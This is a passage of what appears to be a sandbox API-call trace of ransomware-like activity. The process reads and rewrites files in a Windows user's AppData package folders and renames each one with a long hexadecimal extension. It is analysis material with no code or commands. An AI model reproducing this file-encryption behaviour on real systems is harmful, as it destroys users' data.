| out: hHeap=0x600000) returned 1 [0119.290] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.309] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0119.309] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.310] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0119.311] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132586264905672075.txt", lpString2=".C96098C7685F681D55275912C4AA54161E5ABB7BF61FA9B34420E0FB3BA7BD15" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132586264905672075.txt.C96098C7685F681D55275912C4AA54161E5ABB7BF61FA9B34420E0FB3BA7BD15") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132586264905672075.txt.C96098C7685F681D55275912C4AA54161E5ABB7BF61FA9B34420E0FB3BA7BD15" [0119.311] GetProcessHeap () returned 0x600000 [0119.311] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1de) returned 0x6d9690 [0119.311] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x25fff60, FileInformation=0x6d9690, Length=0x1de, FileInformationClass=0xa) returned 0x0 [0119.312] CloseHandle (hObject=0x320) returned 1 [0119.312] GetProcessHeap () returned 0x600000 [0119.312] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0119.312] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.315] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0119.316] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.317] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0119.317] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132586264905700947.txt", lpString2=".7C5C25A29D07539F316A192D2D8491FEA587EE627716D522D33F97335CC0DF18" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132586264905700947.txt.7C5C25A29D07539F316A192D2D8491FEA587EE627716D522D33F97335CC0DF18") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132586264905700947.txt.7C5C25A29D07539F316A192D2D8491FEA587EE627716D522D33F97335CC0DF18" [0119.317] GetProcessHeap () returned 0x600000 [0119.317] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1de) returned 0x6d9878 [0119.317] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x25fff60, FileInformation=0x6d9878, Length=0x1de, FileInformationClass=0xa) returned 0x0 [0119.318] CloseHandle (hObject=0x320) returned 1 [0119.320] GetProcessHeap () returned 0x600000 [0119.320] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0119.321] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.326] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0119.326] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.327] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0119.328] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132632415053778717.txt", lpString2=".F25CE7CF9E05498E612EAB097C765CD636AA94D8A1DD0262D67A77CB015FF875" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132632415053778717.txt.F25CE7CF9E05498E612EAB097C765CD636AA94D8A1DD0262D67A77CB015FF875") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132632415053778717.txt.F25CE7CF9E05498E612EAB097C765CD636AA94D8A1DD0262D67A77CB015FF875" [0119.328] GetProcessHeap () returned 0x600000 [0119.328] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1de) returned 0x6d9a60 [0119.328] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x25fff60, FileInformation=0x6d9a60, Length=0x1de, FileInformationClass=0xa) returned 0x0 [0119.329] CloseHandle (hObject=0x320) returned 1 [0119.329] GetProcessHeap () returned 0x600000 [0119.329] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0119.329] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.332] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0119.332] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.333] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0119.334] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.334] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0119.334] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\SettingsCache.txt", lpString2=".22B3F1D5101F89BE0BCE001C4F735190D211E315E1765FE0E04FA01A3164DE05" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\SettingsCache.txt.22B3F1D5101F89BE0BCE001C4F735190D211E315E1765FE0E04FA01A3164DE05") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\SettingsCache.txt.22B3F1D5101F89BE0BCE001C4F735190D211E315E1765FE0E04FA01A3164DE05" [0119.334] GetProcessHeap () returned 0x600000 [0119.335] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1c4) returned 0x6d9c48 [0119.335] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x25fff60, FileInformation=0x6d9c48, Length=0x1c4, FileInformationClass=0xa) returned 0x0 [0119.336] CloseHandle (hObject=0x320) returned 1 [0119.336] GetProcessHeap () returned 0x600000 [0119.336] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0119.337] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.345] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0119.345] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.346] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0119.346] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin", lpString2=".7B9ADA684D7240AB104FFCE6219B155CAFE5028BC5CE4E6BC43416D824359C17" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin.7B9ADA684D7240AB104FFCE6219B155CAFE5028BC5CE4E6BC43416D824359C17") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin.7B9ADA684D7240AB104FFCE6219B155CAFE5028BC5CE4E6BC43416D824359C17" [0119.346] GetProcessHeap () returned 0x600000 [0119.346] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a8) returned 0x62c898 [0119.346] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x25fff60, FileInformation=0x62c898, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0119.347] CloseHandle (hObject=0x320) returned 1 [0119.347] GetProcessHeap () returned 0x600000 [0119.347] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0119.348] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.425] ReadFile (in: hFile=0x338, lpBuffer=0x690478, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0119.426] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.430] NtQueryObject (in: Handle=0x338, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0119.431] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat", lpString2=".0D6F57B9CF6C3B1138316A805F0AAFCA3B85A7C2D9025C44DDFACA3D716ACC59" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.0D6F57B9CF6C3B1138316A805F0AAFCA3B85A7C2D9025C44DDFACA3D716ACC59") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.0D6F57B9CF6C3B1138316A805F0AAFCA3B85A7C2D9025C44DDFACA3D716ACC59" [0119.431] GetProcessHeap () returned 0x600000 [0119.431] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x260) returned 0x6d9e18 [0119.431] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x25fff60, FileInformation=0x6d9e18, Length=0x260, FileInformationClass=0xa) returned 0x0 [0119.432] CloseHandle (hObject=0x338) returned 1 [0119.433] GetProcessHeap () returned 0x600000 [0119.433] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0119.434] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.469] ReadFile (in: hFile=0x214, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0119.469] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.469] WriteFile (in: hFile=0x214, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0119.470] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.470] NtQueryObject (in: Handle=0x214, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0119.471] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat", lpString2=".A17C734B20B7EE4C45533FACDB267E7123BECAA30EFC48D5507BC30B1F0DF357" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat.A17C734B20B7EE4C45533FACDB267E7123BECAA30EFC48D5507BC30B1F0DF357") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat.A17C734B20B7EE4C45533FACDB267E7123BECAA30EFC48D5507BC30B1F0DF357" [0119.471] GetProcessHeap () returned 0x600000 [0119.471] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a4) returned 0x62d130 [0119.471] NtSetInformationFile (FileHandle=0x214, IoStatusBlock=0x25fff60, FileInformation=0x62d130, Length=0x1a4, FileInformationClass=0xa) returned 0x0 [0119.472] CloseHandle (hObject=0x214) returned 1 [0119.473] GetProcessHeap () returned 0x600000 [0119.473] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0119.479] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.556] ReadFile (in: hFile=0x338, lpBuffer=0x690478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0119.557] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.564] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x25fff70) returned 0x0 [0119.565] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".41A0FB7FA63C824B7D37A54954F4DFC7435982685C624C2E6E939A6938B4F037" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.41A0FB7FA63C824B7D37A54954F4DFC7435982685C624C2E6E939A6938B4F037") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.41A0FB7FA63C824B7D37A54954F4DFC7435982685C624C2E6E939A6938B4F037" [0119.565] GetProcessHeap () returned 0x600000 [0119.565] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x224) returned 0x3184bb8 [0119.565] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x25fff60, FileInformation=0x3184bb8, Length=0x224, FileInformationClass=0xa) returned 0x0 [0119.567] CloseHandle (hObject=0x324) returned 1 [0119.567] GetProcessHeap () returned 0x600000 [0119.567] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0119.570] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.625] WriteFile (in: hFile=0x320, lpBuffer=0x30e82d8, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 0x0 [0119.628] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.753] ReadFile (in: hFile=0x320, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0119.759] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.939] ReadFile (in: hFile=0x31c, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0119.941] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.968] ReadFile (in: hFile=0x324, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0119.968] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.970] WriteFile (in: hFile=0x324, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0119.971] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.973] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x25fff70) returned 0x0 [0119.973] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".8831AB61AE105B42C3D7DCB2FCC0A711BEE7B934901562F9E4E4D895EFA4FA0D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat.8831AB61AE105B42C3D7DCB2FCC0A711BEE7B934901562F9E4E4D895EFA4FA0D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat.8831AB61AE105B42C3D7DCB2FCC0A711BEE7B934901562F9E4E4D895EFA4FA0D" [0119.973] GetProcessHeap () returned 0x600000 [0119.973] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18e) returned 0x6b22d8 [0119.973] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x25fff60, FileInformation=0x6b22d8, Length=0x18e, FileInformationClass=0xa) returned 0x0 [0119.979] CloseHandle (hObject=0x324) returned 1 [0119.979] GetProcessHeap () returned 0x600000 [0119.979] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0119.982] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.030] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0120.030] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.031] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0120.031] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".88D68C686C98CAFD209282D1DA8F7DEEAF1C50951D27F8D4E5D11B6A2C6EAA56" | out: 